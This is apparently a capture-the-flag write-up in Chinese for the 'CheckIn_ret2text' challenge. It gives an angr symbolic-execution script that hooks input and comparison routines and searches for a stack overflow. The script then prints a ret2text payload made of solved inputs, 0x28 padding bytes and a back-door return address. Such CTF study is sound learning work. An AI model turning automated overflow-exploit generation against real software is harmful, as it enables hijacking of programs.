CheckIn_ret2text

符号执行部分

受限于我对 angr 的理解,也不太清楚它的一些高级接口,只能手写一套 hook,并让 state 携带输入字符串来完成符号执行过程

因为代码写得比较杂乱,这里先说明一下内存布局。
为了理解以下代码,需要知道:state.memory 中地址 0x0 的第一个字节记录了已经输入的次数;从偏移 0x100 开始,每 0x100 字节存放一条输入记录,结构为 { type: 1 byte, size: 1 byte, str: size bytes },只能说是对症下药了。为了找到栈溢出,还需要保存上一次输入字符串时允许的长度,我把它保存在 input_str_off = 0x100000 处。我的命名多少有点古怪,明明是个 size,却把它命名成了 str_off …

要是有什么更好的写法,一定要告诉我呀~

2022/3/7 补充:hook 的写法可以写得更简洁一些。这道题可以直接执行,不需要自己去控制程序流或者做额外分析,找到无约束(unconstrained)的状态后直接求解输入即可。

import claripy
import angr
from angr import SimProcedure
import IPython
import archinfo
import copy

# Load address handed to angr for the main binary, and the address at which
# symbolic execution starts.
base = 0x400000
start = 0x4013ED

# Offset and read size of the overflow candidate; main() fills these in.
out_off = 0
out_size = 0

# Number of symbolic variables created so far; used to give each a unique name.
symbol_num = 0

# Bookkeeping layout inside state.memory:
#   byte at 0x0                    -> number of inputs recorded so far
#   input_offset + 0x100 * index   -> record {type: 1 byte, size: 1 byte, data}
#   input_str_off                  -> 4-byte size of the most recent line read
#                                     (it is a size, despite the "_off" name)
input_offset = 0x100
input_str_off = 0x100000
class hook_input_val(SimProcedure):
    """Replace the routine hooked at 0x401216 with a symbolic 32-bit result.

    Each call creates a fresh 32-bit symbol, returns it in ``eax`` and appends
    a type-0 record (size 4) to the input log kept in ``state.memory`` so the
    concrete value can be recovered after solving.
    """

    def __init__(self):
        super().__init__()

    def run(self):
        """Produce one symbolic value, log it, and return to the caller."""
        global symbol_num
        state = self.state
        little = archinfo.Endness.LE

        value = claripy.BVS("input_%i" % symbol_num, 32)
        # Zero the whole of rax first, then write the symbol into eax.
        state.regs.rax = 0
        state.regs.eax = value

        # Byte 0 holds how many inputs have been logged; it doubles as the
        # index of the record slot to fill now.
        index = state.solver.eval(state.memory.load(0x0, 0x1, endness=little))
        record = input_offset + 0x100 * index

        state.memory.store(0x0, index + 1, size=1, endness=little)
        state.memory.store(record, 0, size=1, endness=little)          # type
        state.memory.store(record + 1, 4, size=1, endness=little)      # size
        state.memory.store(record + 2, value, size=4, endness=little)  # value

        symbol_num += 1
        # Return by hand: pop the return address and jump to it.
        self.jump(state.stack_pop())

# 0x401272
class hook_input_line(SimProcedure):
    """Replace the line-reading routine with fully symbolic bytes.

    The destination pointer is taken from ``rdi`` and the byte count from
    ``esi``. Every call writes that many fresh symbolic bytes to the
    destination, appends a type-1 record to the input log in ``state.memory``
    and stores the byte count at ``input_str_off``.
    """

    def __init__(self):
        super().__init__()

    def run(self):
        """Fill the caller's buffer with symbols, log them, and return."""
        global symbol_num
        state = self.state
        little = archinfo.Endness.LE
        big = archinfo.Endness.BE

        length = state.solver.eval(state.regs.esi)
        dest = state.regs.rdi

        # Byte 0 holds how many inputs have been logged; it doubles as the
        # index of the record slot to fill now.
        index = state.solver.eval(state.memory.load(0x0, 0x1, endness=little))
        record = input_offset + 0x100 * index

        # One 8-bit symbol per byte, named with consecutive global indices.
        chars = []
        for number in range(symbol_num, symbol_num + length):
            chars.append(claripy.BVS("input_%d" % number, 8))
        data = claripy.Concat(*chars)

        state.memory.store(0x0, index + 1, size=1, endness=little)

        state.memory.store(record, 1, size=1, endness=little)           # type
        state.memory.store(record + 1, length, size=1, endness=little)  # size
        state.memory.store(record + 2, data, size=length, endness=big)  # bytes

        # The same symbolic bytes go into the caller's buffer.
        state.memory.store(dest, data, size=length, endness=big)
        # Remember the size of this read for later strcmp/overflow checks.
        state.memory.store(input_str_off, length, size=4, endness=little)

        symbol_num += length
        # Return by hand: pop the return address and jump to it.
        self.jump(state.stack_pop())

# 0x4012CE
class hook_strcmp(SimProcedure):
    """Stub that returns to the caller without touching registers or memory."""

    def __init__(self):
        super().__init__()

    def run(self):
        """Pop the return address off the stack and jump to it."""
        return_addr = self.state.stack_pop()
        self.jump(return_addr)


# 0x4010C0
class hook_printf(SimProcedure):
    """Stub that skips the hooked call: nothing is printed or modelled."""

    def __init__(self):
        super().__init__()

    def run(self):
        """Pop the return address off the stack and jump to it."""
        return_addr = self.state.stack_pop()
        self.jump(return_addr)

def _fork_on_strcmp(state):
    """Turn *state* into the "strings equal" outcome and return the other one.

    *state* is sitting on the hooked compare routine. It is constrained so the
    two buffers (pointed to by rsi and rdi) match and gets rax = 0; the
    returned copy is constrained so they differ and gets rax = 1. The number
    of bytes compared is the size of the most recent line read, taken from
    ``input_str_off``.
    """
    big = archinfo.Endness.BE

    # SimState.copy() is angr's supported way to fork a state.
    differ = state.copy()

    length = state.solver.eval(
        state.memory.load(input_str_off, 4, endness=archinfo.Endness.LE)
    )

    state.regs.rax = 0  # equal
    lhs = state.memory.load(state.regs.rsi, length, endness=big)
    rhs = state.memory.load(state.regs.rdi, length, endness=big)
    state.add_constraints(lhs == rhs)

    differ.regs.rax = 1  # not equal
    # Load through the copy's own registers rather than the other branch's.
    lhs = differ.memory.load(differ.regs.rsi, length, endness=big)
    rhs = differ.memory.load(differ.regs.rdi, length, endness=big)
    differ.add_constraints(lhs != rhs)

    return differ


def _lea_displacement(op_str):
    """Return the trailing displacement of a ``lea`` operand string, or None.

    Accepts both ``[rbp - 0x20]`` and ``[rbp - 8]`` spellings of the
    displacement. Only the magnitude is returned; the sign is ignored.
    """
    import re

    found = re.search(r"[-+]\s*(0x[0-9a-fA-F]+|\d+)\s*\]", op_str)
    if found is None:
        return None
    return int(found.group(1), 0)


def _render_recorded_inputs(state):
    """Solve and serialise every input record logged in *state*.

    Type-0 records are emitted as a decimal number followed by a space;
    type-1 records are emitted as raw bytes. Records of any other type are
    skipped.
    """
    little = archinfo.Endness.LE
    count = state.solver.eval(state.memory.load(0x0, 0x1, endness=little))

    parts = []
    for index in range(count):
        record = input_offset + 0x100 * index
        kind = state.solver.eval(state.memory.load(record, 1, endness=little))
        length = state.solver.eval(
            state.memory.load(record + 1, 1, endness=little)
        )
        if kind == 0:
            number = state.solver.eval(
                state.memory.load(record + 2, length, endness=little)
            )
            parts.append(str(number).encode('utf-8') + b' ')
        elif kind == 1:
            parts.append(
                state.solver.eval(
                    state.memory.load(
                        record + 2, length, endness=archinfo.Endness.BE
                    ),
                    cast_to=bytes,
                )
            )
    return b"".join(parts)


def main():
    """Explore ./binary symbolically and print an input that reaches the
    back door through a stack overflow.

    States are stepped one basic block at a time in first-in, first-out
    order. Whenever a block that starts with ``lea`` calls the line-reading
    routine and the recorded read size exceeds the ``lea`` displacement, the
    calling state is kept as the overflow candidate and the search stops.
    The inputs logged on that state are then solved and printed, followed by
    padding and the back-door address. Nothing is printed when no candidate
    is found.

    Side effects: sets the module globals ``out_off`` and ``out_size``.
    """
    from collections import deque
    import struct  # replaces the undefined p64() used previously

    global out_off
    global out_size

    # Addresses inside the target binary.
    input_val_addr = 0x401216
    input_line_addr = 0x401272
    printf_addr = 0x4010C0
    strcmp_addr = 0x4012CE
    back_door = 0x401351

    # NOTE(review): auto_load_libs is normally a top-level load option rather
    # than a main_opts key - confirm it has any effect here.
    p = angr.Project(
        "./binary",
        load_options={
            'main_opts': {
                'auto_load_libs': True,
                'base_addr': base,
            },
        },
    )
    p.hook(input_line_addr, hook_input_line())
    p.hook(input_val_addr, hook_input_val())
    p.hook(printf_addr, hook_printf())
    p.hook(strcmp_addr, hook_strcmp())

    st = p.factory.blank_state(addr=start)
    st.memory.store(0, 0, size=1)  # no inputs recorded yet

    st.regs.rsp = 0x8000000
    st.regs.rbp = 0x7000000
    st.regs.rbx = 0x0

    pending = deque([st])
    has_overflow = []

    while pending:
        st = pending.popleft()
        sucs = list(st.step().successors)

        if sucs:
            # Prune the path when the first successor's block starts with
            # `mov eax, 0` followed by `jmp` (presumably the failure path -
            # confirm against the disassembly).
            insns = sucs[0].block().capstone.insns
            if (
                len(insns) >= 2
                and insns[0].mnemonic == 'mov'
                and insns[0].op_str == 'eax, 0'
                and insns[1].mnemonic == 'jmp'
            ):
                sucs.clear()

        if sucs and sucs[0].addr == strcmp_addr:
            # The strcmp hook only returns, so both outcomes of the compare
            # are modelled here before the hook runs.
            sucs.append(_fork_on_strcmp(sucs[0]))

        for nxt in sucs:
            if nxt.addr == input_line_addr:
                print("LOG: FIND ONE MAY OVERFLOW ", hex(st.addr))
                # NOTE(review): nxt has not executed the input_line hook yet,
                # so this looks like the size recorded by the previous read -
                # confirm that is the intended value to compare.
                size = nxt.solver.eval(
                    nxt.memory.load(
                        input_str_off, 4, endness=archinfo.Endness.LE
                    )
                )
                caller_insns = st.block().capstone.insns
                if caller_insns and caller_insns[0].mnemonic == 'lea':
                    off = _lea_displacement(caller_insns[0].op_str)
                    if off is not None and size > off:
                        out_off = off
                        out_size = size
                        has_overflow.append(st)
                        pending.clear()
                        break
            pending.append(nxt)

    if has_overflow:
        result = _render_recorded_inputs(has_overflow[0])
        # NOTE(review): the padding is fixed at 0x28 bytes rather than derived
        # from out_off - confirm it matches the vulnerable frame.
        result += 0x28 * b'a' + struct.pack("<Q", back_door)
        print(result)
        
# Run the search only when this file is executed as a script.
if __name__ == "__main__":
    main()